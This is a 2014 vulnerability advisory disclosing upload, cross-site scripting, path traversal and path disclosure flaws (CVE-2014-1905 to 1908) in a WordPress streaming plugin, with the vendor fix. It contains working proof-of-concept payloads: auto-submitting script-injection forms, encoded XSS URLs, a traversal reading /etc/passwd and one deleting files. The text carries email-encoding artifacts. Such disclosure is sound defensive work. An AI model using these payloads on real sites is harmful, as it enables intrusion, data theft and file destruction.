Advisory ID: HTB23199 Product: VideoWhisper Live Streaming Integration Vendor: VideoWhisper Vulnerable Version(s): 4.27.3 and probably prior Tested Version: 4.27.3 Advisory Publication: February 6, 2014 [without technical details] Vendor Notification: February 6, 2014=20 Vendor Patch: February 7, 2014=20 Public Disclosure: February 27, 2014=20 Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-43= 4], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exp= osure Through Externally-Generated Error Message [CWE-211] CVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908 Risk Level: Critical=20 CVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N= /I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities = in VideoWhisper Live Streaming Integration, which can be exploited to execu= te arbitrary code on the target system, gain access to potentially sensitiv= e data, perform Cross-Site Scripting (XSS) attacks against users of vulnera= ble application and delete arbitrary files. 1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-20= 14-1905 VideoWhisper Live Streaming Integration does not properly verify malicious = file extensions before uploading files to the server in "/wp-content/plugin= s/videowhisper-live-streaming-integration/ls/vw_snapshots.php". A remote at= tacker can upload and execute arbitrary PHP file on the target system.=20 The following PoC code demonstrates exploitation of the vulnerability: After successful exploitation the remote shell will be accessible via the f= ollowing URL: http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /snapshots/1.php.jpg Successful exploitation of this vulnerability requires that the webserver i= s not configured to handle the mime-type for media files with .jpg extensio= n. 2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: C= VE-2014-1906 2.1 The vulnerability exists due to insufficient filtration of "m" HTTP POS= T parameter in "/wp-content/plugins/videowhisper-live-streaming-integration= /ls/lb_status.php" script. A remote attacker can send a specially crafted H= TTP POST request to the vulnerable script and permanently inject and execut= e arbitrary html and script code in browser in context of the vulnerable we= bsite when user visits a page with enabled plugin=E2=80=99s widget. The scr= ipt will be also executed in administrative section on the following page:= =20 http://[host]/wp-admin/options-general.php?page=3Dvideowhisper_streaming.ph= p&tab=3Dlive The exploitation examples below use the "alert()" JavaScript function to di= splay "immuniweb" word: <body onLoad=3D"document.hack.submit()"> <form name=3D"hack" action=3D"http://[host]/wp-content/plugins/videowhisper= -live-streaming-integration/ls/lb_status.php" method=3D"post"> <input type=3D"hidden" name=3D"s" value=3D"1"> <input type=3D"hidden" name=3D"u" value=3D"1"> <input type=3D"hidden" name=3D"r" value=3D"1"> <input type=3D"hidden" name=3D"m" value=3D"<script>alert('immuniweb')</scri= pt>"> </form> </body> =20 2.2 The vulnerability exists due to insufficient filtration of "msg" HTTP P= OST parameter in "/wp-content/plugins/videowhisper-live-streaming-integrati= on/ls/vc_chatlog.php" script. A remote attacker can send a specially crafte= d HTTP POST request to the vulnerable script and permanently inject and exe= cute arbitrary html and script code in browser in context of the vulnerable= website when user visits the affected page.=20 The exploitation examples below use the "alert()" JavaScript function to di= splay "immuniweb" word: <body onLoad=3D"document.hack.submit()"> <form name=3D"hack" action=3D"http://[host]/wp-content/plugins/videowhisper= -live-streaming-integration/ls/vc_chatlog.php" method=3D"post"> <input type=3D"hidden" name=3D"msg" value=3D"<script>alert('immuniweb')</sc= ript>"> <input type=3D"hidden" name=3D"r" value=3D"1"> </form> </body> The code will be executed when the user visits the following URL: http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /uploads/[room]/Log[date].html=20 Where [room] is set by HTTP POST parameter r and [date] is the current date= =2E =20 2.3 The vulnerabilities exist due to insufficient filtration of "n" HTTP GE= T parameter passed to scripts "channel.php", "htmlchat.php", "video.php" an= d "videotext.php" within the "/wp-content/plugins/videowhisper-live-streami= ng-integration/ls/" directory. A remote attacker can send a specially craft= ed HTTP GET request to vulnerable scripts and execute arbitrary HTML and sc= ript code in browser in context of the vulnerable website. The exploitation examples below use the "alert()" JavaScript function to di= splay "immuniweb" word: http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /channel.php?n=3D%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /htmlchat.php?n=3D%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /video.php?n=3D%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /videotext.php?n=3D%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script= %3E 2.4 The vulnerability exists due to insufficient filtration of "message" HT= TP GET parameter passed to "/wp-content/plugins/videowhisper-live-streaming= -integration/ls/lb_logout.php" script. A remote attacker can trick a user t= o open a specially crafted link and execute arbitrary HTML and script code = in browser in context of the vulnerable website. The exploitation example below uses the "alert()" JavaScript function to di= splay "immuniweb" word: http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /lb_logout.php?message=3D%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/scri= pt%3E 2.5 The vulnerability exists due to insufficient filtration of "ct" HTTP PO= ST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-int= egration/ls/lb_status.php" script. A remote attacker can trick a logged-in = user to open a specially crafted link and execute arbitrary HTML and script= code in browser in context of the vulnerable website. The exploitation example below uses the "alert()" JavaScript function to di= splay "immuniweb" word: <body onLoad=3D"document.hack.submit()"> <form name=3D"hack" action=3D"http://[host]/wp-content/plugins/videowhisper= -live-streaming-integration/ls/lb_status.php" method=3D"post"> <input type=3D"hidden" name=3D"s" value=3D"1"> <input type=3D"hidden" name=3D"r" value=3D"1"> <input type=3D"hidden" name=3D"ct" value=3D"<script>alert('immuniweb')</scr= ipt>"> </form> </body> 2.6 The vulnerability exists due to insufficient filtration of "ct" HTTP PO= ST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-int= egration/ls/v_status.php" script. A remote attacker can trick a user to ope= n a specially crafted link and execute arbitrary HTML and script code in br= owser in context of the vulnerable website. The exploitation example below uses the "alert()" JavaScript function to di= splay "immuniweb" word: =20 <body onLoad=3D"document.hack.submit()"> <form name=3D"hack" action=3D"http://[host]/wp-content/plugins/videowhisper= -live-streaming-integration/ls/v_status.php" method=3D"post"> <input type=3D"hidden" name=3D"s" value=3D"1"> <input type=3D"hidden" name=3D"r" value=3D"1"> <input type=3D"hidden" name=3D"ct" value=3D"<script>alert('immuniweb')</scr= ipt>"> </form> </body> 3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907 =20 3.1 The vulnerability exists due to insufficient filtration of "s" HTTP GET= parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/= ls/rtmp_login.php" script. A remote attacker can view contents of arbitrary= files on the target system using directory traversal sequences. The exploitation example below displays contents of "/etc/passwd" file: http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /rtmp_login.php?s=3D../../../../../../etc/passwd 3.2 The vulnerability exists due to insufficient filtration of "s" HTTP GET= parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/= ls/rtmp_logout.php" script. A remote attacker can delete arbitrary files on= the target system using directory traversal sequences. The exploitation example below deletes a file "/tmp/immuniweb": http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /rtmp_logout.php?s=3D../../../../../../../../tmp/immuniweb Successful exploitation of this vulnerability requires that file "/tmp/immu= niweb" exists on the system. 4) Information Exposure Through Externally-generated Error Message in Video= Whisper Live Streaming Integration: CVE-2014-1908 4.1 The vulnerability exists due to improper implementation of error handli= ng mechanisms in multiple scripts. A remote attacker can send a specially c= rafted HTTP GET request to vulnerable scripts and gain knowledge of full in= stallation path of the application.=20 The following URL can be used to gain knowledge of full installation path o= f the application: http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp= =2Ephp http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/vi= deowhisper_streaming.php http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls= /rtmp.inc.php ---------------------------------------------------------------------------= -------------------- Solution: Update to VideoWhisper Live Streaming Integration version 4.29.5 ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/= HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integrat= ion Plugin for WordPress. [2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/= videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming = software can easily be used to add video broadcasting features to WordPress= sites and live video streams on blog pages. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE - http://www.htbridge.com/immuniweb/ - is High-Tech Bri= dge's proprietary web application security assessment solution with SaaS de= livery model that combines manual and automated vulnerability testing. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.